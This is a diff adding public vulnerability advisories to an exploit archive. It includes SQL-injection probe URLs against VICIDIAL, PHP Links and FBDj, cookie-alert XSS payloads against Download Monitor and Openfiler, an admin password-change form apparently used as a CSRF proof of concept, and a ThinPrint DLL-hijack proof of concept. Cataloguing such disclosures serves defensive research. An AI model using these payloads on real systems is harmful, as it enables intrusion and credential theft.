+User Name:<input type="text" class="txtFname" name="uname" readonly="readonly" id="uname" size="50" value="admin@pinterestclones.com"/>
+New Password:<input type="password" class="txtFname" name="password" id="password" size="50" value=""/>
+Confirm Password:<input type="password" class="txtFname" name="cpassword" id="cpassword" size="50" value=""/>
+Site Slogan:<input type="text" name="txtSlogan" id="txtSlogan" size="50" value="Your online pinboard"/>
+Site URL:<input type="text" name="txtUrl" id="txtUrl" size="50" value=""/>
+Admin Email:<input type="text" name="aemail" id="aemail" size="50" value=""/>
+.Under maintenance:<select name="maintenance">
+<option value="No" selected>No</option>
+<option value="Yes">Yes</option>
+</select>
+Maintenance message:
+<input type="text" name="maintenancemsg" id="maintenancemsg" size="50" value="We are upgrading the site."/>
+<dl class="submit">
+<input type="submit" value="Save" class="submit" name="sbmtbtn" style="width:50px;"/>
+</form>
+

platforms/php/webapps/37785.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/55476/info
+
+VICIDIAL Call Center Suite is prone to multiple SQL-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+VICIDIAL Call Center Suite 2.2.1-237 and prior are vulnerable. 
+
+http://www.example.com/AST_agent_time_sheet.php?agent=some-agent' and sleep(15)='&calls_summary=1&query_date=2012-09-07
+
+http://www.example.com/AST_timeonVDADall.php?adastats=1&DB=0&groups[]=1345' and sleep(15)='&RR=4
+
+http://www.example.com/vicidial_demo/user_stats.php?user=2000' and sleep(10)='

platforms/php/webapps/37786.txt

@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/55478/info
+
+DeltaScripts PHP Links is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+DeltaScripts PHP Links 2012 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/phplinks/index.php?catid=[SQL]
+
+http://www.example.com/phplinks/review.php?id=[SQL]
+
+http://www.example.com/phplinks/search.php?search=[SQL]
+
+http://www.example.com/phplinks/admin/adm_fill_options.php?field=[SQL]
+
+http://www.example.com/phplinks/vote.php
+
+In POST method :
+
+id=[SQL]&rating=
+
+http://www.example.com/phplinks/admin/adm_login.php
+
+In POST method :
+
+admin_password=test&admin_username=[SQL]&submit=Login
+
+http://www.example.com/phplinks/login.php
+
+In POST method :
+
+email=[SQL]&forgotten=&password=[SQL]&submit=Login
+
+

platforms/php/webapps/37787.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55487/info
+
+The Download Monitor plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Download Monitor 3.3.5.7 is vulnerable; other versions may also be affected. 
+
+GET /wp/?dlsearch=">alert('xsstest') HTTP/1.1 

platforms/php/webapps/37789.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/55500/info
+
+Openfiler is prone to multiple cross-site scripting and information disclosure vulnerabilities.
+
+An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Openfiler versions 2.3, 2.99.1 and 2.99.2 are vulnerable; other versions may also be affected. 
+
+https://www.example.com/admin/system.html?step=2&device="><script>alert(document.cookie);</script><p+"
+
+https://www.example.com/admin/volumes_iscsi_targets.html?targetName="><script>alert(document.cookie);</script><p+"
+
+https://www.example.com/phpinfo.html
+
+https://www.example.com/uptime.html 

platforms/php/webapps/37790.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/55504/info
+
+FBDj is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/stats/playerdetails.php?id=5'
+
+http://www.example.com/warstats/playerdetails.php?id=13'
+
+http://www.example.com/playerdetails.php?id=9'
+
+http://www.example.com/il2-stats/playerdetails.php?id=29' 

platforms/windows/local/37780.c

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/55421/info
+
+ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.
+
+Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application. 
+
+#include <windows.h> 
+
+	int hijack_poc () 
+	{ 
+	  WinExec ( "calc.exe" , SW_NORMAL );
+	  return 0 ; 
+	} 
+	  
+	BOOL WINAPI DllMain 
+		 (	HINSTANCE hinstDLL , 
+			DWORD dwReason ,
+			LPVOID lpvReserved ) 
+	{ 
+	  hijack_poc () ;
+	  return 0 ;
+	} 

platforms/windows/remote/616.c

@@ -215,6 +215,6 @@ cout<<"        =============Remote Buffer Overflow Exploit=================="<<e
 cout<<"        ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl;
 cout<<"        ============================================================="<<endl;
 cout<<"                                                                   "<<endl;
-}
+}
-
+
-// milw0rm.com [2004-11-07]
+// milw0rm.com [2004-11-07]